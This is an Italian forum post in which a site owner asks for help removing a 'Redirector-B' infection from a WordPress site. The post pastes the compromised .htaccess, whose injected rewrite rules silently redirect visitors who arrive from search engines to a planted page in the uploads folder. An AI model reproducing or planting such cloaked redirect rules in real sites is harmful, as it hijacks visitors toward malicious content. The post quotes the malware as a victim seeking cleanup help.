Salve a tutti, ho un "piccolo" problema su un sito. É da un po' di tempo che alcuni antivirus segnalano la presenza di un Redirector-B, e non so come toglierlo.
Ho guardato un po' in giro, mi sono informato, ma non riesco a capire come fare ad eradicare il problema alla fonte. Ci sono delle cartelle create dal virus, le rimuovo, e poco dopo ricompaiono. Ho controllato il file .htaccess ed in effetti è pieno di schifezze varie, ma non intendendomene non mi arrischio a toccarlo, ve lo copio qua sotto:
É un problema che è già presente da una vita, stupidamente l'ho sottovalutato, e ora ha sta prendendo proporzioni decisamente piú grandi.codice:# -FrontPage- IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* <Limit GET POST> order deny,allow deny from all allow from all </Limit> <Limit PUT DELETE> order deny,allow deny from all </Limit> AuthName www.sito.com AuthUserFile /home/sito/public_html/_vti_pvt/service.pwd AuthGroupFile /home/sito/public_html/_vti_pvt/service.grp # a0b4df006e02184c60dbf503e71c87ad RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC] RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\= RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22) RewriteCond %{TIME_SEC} <59 RewriteRule ^.*$ /wp/wp-content/uploads/2008/elijipo/ex3/t.htm [L] # a995d2cc661fa72452472e9554b5520c
Grazie a chi mi darà una mano a capire da che parte iniziare
edit: mi sono dimenticato di dire che il problema è partito da word press e si sta estendendo al vbulletin presente sullo stesso dominio.

Rispondi quotando